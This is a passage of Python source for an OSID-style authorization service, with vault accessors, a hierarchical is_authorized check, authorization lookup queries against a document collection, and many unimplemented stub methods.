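    #     parameter:useCachingForQualifierIds@json  -> True
    #     parameter:cachingEngine@json              -> 'memcache' or 'diskcache' (default)
    #     parameter:cachingHostURI@json             -> '127.0.0.1:11211'
    #
    # With the first parameter absent or False, every call falls through to a
    # direct hierarchy traversal; with 'diskcache' selected, entries are
    # persisted under /tmp/dlkit_cache as shown above.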
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_access_authorizations(self):
"""Tests if this user can perform authorization checks.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if authorization methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return True
@utilities.arguments_not_none
def is_authorized(self, agent_id, function_id, qualifier_id):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hieratchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-nornmalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
return: (boolean) - ``true`` if the user is authorized,
            ``false`` otherwise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id`` or
``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
        using specific nodes in a ``Function`` or ``Qualifier``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
def is_parent_authorized(catalog_id):
"""Recursively checks parents for implicit authorizations"""
parent_id_list = self._get_parent_id_list(catalog_id, hierarchy_id)
if parent_id_list:
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': parent_id_list}})
except errors.NotFound:
for parent_id in parent_id_list:
if is_parent_authorized(Id(parent_id)):
return True
return False
else:
return True
else:
return False
# Check first for an explicit or 'ROOT' level implicit authorization:
try:
authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
        except (KeyError, IndexError):
            # split('.')[1] raises IndexError when the namespace has no
            # '<package>.<catalog>' prefix; fall back to the flat qualifier.
idstr_list = [str(qualifier_id)]
authority = identifier = None
else:
# handle aliased IDs
package_name = qualifier_id.get_identifier_namespace().split('.')[0]
qualifier_id = self._get_id(qualifier_id, package_name)
root_qualifier_id = Id(
authority=qualifier_id.get_authority(),
namespace=qualifier_id.get_identifier_namespace(),
identifier='ROOT')
idstr_list = [str(root_qualifier_id), str(qualifier_id)]
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': idstr_list}})
# Otherwise check for implicit authorization through inheritance:
except errors.NotFound:
if authority and identifier:
hierarchy_id = Id(authority=authority,
namespace='CATALOG',
identifier=identifier)
return is_parent_authorized(qualifier_id)
else:
return False
else:
return True
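    # Minimal usage sketch (hypothetical Ids, for illustration only; real
    # deployments build Ids from their own authority/namespace conventions):
    #
    #     allowed = session.is_authorized(
    #         agent_id=Id(authority='MIT', namespace='authentication.Agent',
    #                     identifier='jane'),
    #         function_id=Id(authority='ODL.MIT.EDU',
    #                        namespace='authorization.Function',
    #                        identifier='lookup'),
    #         qualifier_id=Id(authority='ODL.MIT.EDU',
    #                         namespace='authorization.Vault',
    #                         identifier='ROOT'))
    #
    # An explicit match, a 'ROOT'-level implicit match, or an authorization on
    # any ancestor catalog in the qualifier's hierarchy all return True.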
@utilities.arguments_not_none
def get_authorization_condition(self, function_id):
"""Gets the ``AuthorizationCondition`` for making conditional authorization checks.
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
return: (osid.authorization.AuthorizationCondition) - an
authorization condition
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def is_authorized_on_condition(self, agent_id, function_id, qualifier_id, condition):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
        ``Agent,`` ``Function`` and ``Qualifier`` match the supplied
        parameters. Authorizations may be defined using groupings or
        hierarchical structures for both the ``Agent`` and the
        ``Qualifier`` but are queried in the de-normalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
arg: condition (osid.authorization.AuthorizationCondition):
an authorization condition
return: (boolean) - ``true`` if the user is authorized,
            ``false`` otherwise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id,
qualifier_id`` , or ``condition`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
raise: Unsupported - ``condition`` is not of this service
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
        using specific nodes in a ``Function`` or ``Qualifier``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
raise errors.Unimplemented()
class AuthorizationLookupSession(abc_authorization_sessions.AuthorizationLookupSession, osid_sessions.OsidSession):
"""This session defines methods to search and retrieve ``Authorization`` mappings."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_lookup_authorizations(self):
"""Tests if this user can perform authorization lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.can_lookup_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_comparative_authorization_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_comparative_resource_view
self._use_comparative_object_view()
def use_plenary_authorization_view(self):
"""A complete view of the ``Authorization`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_plenary_resource_view
self._use_plenary_object_view()
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts lookups to this vault only.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_effective_authorization_view(self):
"""Only authorizations whose effective dates are current are returned by methods in this session.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_effective_relationship_view
self._use_effective_view()
def use_any_effective_authorization_view(self):
"""All authorizations of any effective dates are returned by all methods in this session.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.use_any_effective_relationship_view
self._use_any_effective_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
``explicitAuthorizationView()``.
        *compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
*compliance: mandatory -- This method is must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorization(self, authorization_id):
"""Gets the ``Authorization`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Authorization`` may have a
different ``Id`` than requested, such as the case where a
duplicate ``Id`` was assigned to an ``Authorization`` and
retained for compatibility.
arg: authorization_id (osid.id.Id): the ``Id`` of the
``Authorization`` to retrieve
return: (osid.authorization.Authorization) - the returned
``Authorization``
raise: NotFound - no ``Authorization`` found with the given
``Id``
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resource
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find_one(
dict({'_id': ObjectId(self._get_id(authorization_id, 'authorization').get_identifier())},
**self._view_filter()))
return objects.Authorization(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_ids(self, authorization_ids):
"""Gets an ``AuthorizationList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the
authorizations specified in the ``Id`` list, in the order of the
list, including duplicates, or an error results if an ``Id`` in
the supplied list is not found or inaccessible. Otherwise,
inaccessible ``Authorizations`` may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: authorization_ids (osid.id.IdList): the list of ``Ids``
to retrieve
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NotFound - an ``Id was`` not found
raise: NullArgument - ``authorization_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_ids
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
object_id_list = []
for i in authorization_ids:
object_id_list.append(ObjectId(self._get_id(i, 'authorization').get_identifier()))
result = collection.find(
dict({'_id': {'$in': object_id_list}},
**self._view_filter()))
result = list(result)
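        # $in does not guarantee result order, so re-sort to match the order
        # of the requested Ids (duplicates included, per the plenary-mode
        # contract in the docstring).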
sorted_result = []
for object_id in object_id_list:
for object_map in result:
if object_map['_id'] == object_id:
sorted_result.append(object_map)
break
return objects.AuthorizationList(sorted_result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` which does not include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_genus_type
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'genusTypeId': str(authorization_genus_type)},
**self._view_filter())).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_authorizations_by_parent_genus_type(self, authorization_genus_type):
"""Gets an ``AuthorizationList`` corresponding to the given authorization genus ``Type`` and include authorizations of genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_genus_type (osid.type.Type): an
authorization genus type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_by_record_type(self, authorization_record_type):
"""Gets an ``AuthorizationList`` containing the given authorization record ``Type``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: authorization_record_type (osid.type.Type): an
authorization record type
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: NullArgument - ``authorization_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources_by_record_type
# STILL NEED TO IMPLEMENT!!!
return objects.AuthorizationList([])
@utilities.arguments_not_none
def get_authorizations_on_date(self, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_on_date
authorization_list = []
for authorization in self.get_authorizations():
if overlap(from_, to, authorization.start_date, authorization.end_date):
authorization_list.append(authorization)
return objects.AuthorizationList(authorization_list, runtime=self._runtime)
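    # Note: the spec wording above asks for authorizations effective across the
    # *entire* [from_, to] range; ``overlap`` as used here matches any
    # authorization whose effective window intersects the range, which is a
    # looser test inherited from the relationship template.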
@utilities.arguments_not_none
def get_authorizations_for_resource(self, resource_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_on_date(self, resource_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent(self, agent_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_on_date(self, agent_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, from`` or ``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_function(self, function_id):
"""Gets a list of ``Authorizations`` associated with a given function.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'functionId': str(function_id)},
**self._view_filter()))
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_function_on_date(self, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given function and effective during the entire given date range inclusive but not confined to the date range.
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``function_id, from`` or ``to`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function(self, resource_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given resource.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``resource_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.relationship.RelationshipLookupSession.get_relationships_for_peers
# NOTE: This implementation currently ignores plenary and effective views
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'sourceId': str(resource_id),
'destinationId': str(function_id)},
**self._view_filter())).sort('_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_resource_and_function_on_date(self, resource_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` effective during the entire given date range inclusive but not confined to the date range.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
In effective mode, authorizations are returned that are
currently effective. In any effective mode, active
authorizations and those currently expired are returned.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``resource_id, function_id, from`` or
``to`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function(self, agent_id, function_id):
"""Gets a list of ``Authorizations`` associated with a given agent.
Authorizations related to the given resource, including those
related through an ``Agent,`` are returned. In plenary mode, the
returned list contains all known authorizations or an error
results. Otherwise, the returned list may contain only those
authorizations that are accessible through this session.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``agent_id`` or ``function_id`` is
``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(
dict({'agentId': str(agent_id),
'functionId': str(function_id)},
                 **self._view_filter())).sort('_id', ASCENDING)
return objects.AuthorizationList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_authorizations_for_agent_and_function_on_date(self, agent_id, function_id, from_, to):
"""Gets an ``AuthorizationList`` for the given agent and effective during the entire given date range inclusive but not confined to the date range.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: function_id (osid.id.Id): a function ``Id``
arg: from (osid.calendaring.DateTime): starting date
arg: to (osid.calendaring.DateTime): ending date
return: (osid.authorization.AuthorizationList) - the returned
``Authorization`` list
raise: InvalidArgument - ``from`` is greater than ``to``
raise: NullArgument - ``agent_id, function_id, from`` or ``to``
is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_authorizations_by_qualifier(self, qualifier_id):
"""Gets a list of ``Authorizations`` associated with a given qualifier.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
arg: qualifier_id (osid.id.Id): a qualifier ``Id``
return: (osid.authorization.AuthorizationList) - the returned
``Authorization list``
raise: NullArgument - ``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_explicit_authorization(self, authorization_id):
"""Gets the explicit ``Authorization`` that generated the given implicit authorization.
If the given ``Authorization`` is explicit, then the same
``Authorization`` is returned.
arg: authorization_id (osid.id.Id): an authorization
return: (osid.authorization.Authorization) - the explicit
``Authorization``
raise: NotFound - ``authorization_id`` is not found
raise: NullArgument - ``authorization_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorizations(self):
"""Geta all ``Authorizations``.
In plenary mode, the returned list contains all known
authorizations or an error results. Otherwise, the returned list
may contain only those authorizations that are accessible
through this session.
return: (osid.authorization.AuthorizationList) - a list of
``Authorizations``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.get_resources
# NOTE: This implementation currently ignores plenary view
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
result = collection.find(self._view_filter()).sort('_id', DESCENDING)
return objects.AuthorizationList(result, runtime=self._runtime, proxy=self._proxy)
authorizations = property(fget=get_authorizations)
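# A hypothetical usage sketch (not part of the OSID API) showing how the
# lookup methods above might be driven. The manager, proxy, and Ids are
# assumed to come from an already-configured runtime; the session and view
# methods called here are the ones defined on AuthorizationLookupSession.
def _example_lookup_agent_authorizations(manager, proxy, agent_id, function_id):
    session = manager.get_authorization_lookup_session(proxy=proxy)
    session.use_federated_vault_view()  # include authorizations in child vaults
    return session.get_authorizations_for_agent_and_function(agent_id, function_id)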
class AuthorizationQuerySession(abc_authorization_sessions.AuthorizationQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching ``Authorization`` objects.
The search query is constructed using the ``AuthorizationQuery``.
This session defines views that offer differing behaviors for
searching.
* federated view: searches include authorizations in ``Vaults`` of
      which this vault is an ancestor in the vault hierarchy
* isolated view: searches are restricted to authorizations in this
``Vault``
* implicit authorization view: authorizations include implicit
authorizations
* explicit authorization view: only explicit authorizations are
returned
"""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_search_authorizations(self):
"""Tests if this user can perform authorization searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.can_search_resources
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def use_federated_vault_view(self):
"""Federates the view for methods in this session.
A federated view will include authorizations in vaults which are
children of this vault in the vault hierarchy.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_federated_bin_view
self._use_federated_catalog_view()
def use_isolated_vault_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this vault only.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceLookupSession.use_isolated_bin_view
self._use_isolated_catalog_view()
def use_implicit_authorization_view(self):
"""Sets the view for methods in this session to implicit authorizations.
An implicit view will include authorizations derived from other
authorizations as a result of the ``Qualifier,`` ``Function`` or
``Resource`` hierarchies. This method is the opposite of
        ``explicitAuthorizationView()``.
        *compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def use_explicit_authorization_view(self):
"""Sets the view for methods in this session to explicit authorizations.
An explicit view includes only those authorizations that were
explicitly defined and not implied. This method is the opposite
of ``implicitAuthorizationView()``.
        *compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_authorization_query(self):
"""Gets an authorization query.
return: (osid.authorization.AuthorizationQuery) - the
authorization query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.ResourceQuerySession.get_resource_query_template
return queries.AuthorizationQuery(runtime=self._runtime)
authorization_query = property(fget=get_authorization_query)
@utilities.arguments_not_none
def get_authorizations_by_query(self, authorization_query):
"""Gets a list of ``Authorizations`` matching the given query.
arg: authorization_query
(osid.authorization.AuthorizationQuery): the
authorization query
return: (osid.authorization.AuthorizationList) - the returned
``AuthorizationList``
raise: NullArgument - ``authorization_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``authorization_query`` is not of this
service
*compliance: mandatory -- This method must be implemented.*
"""
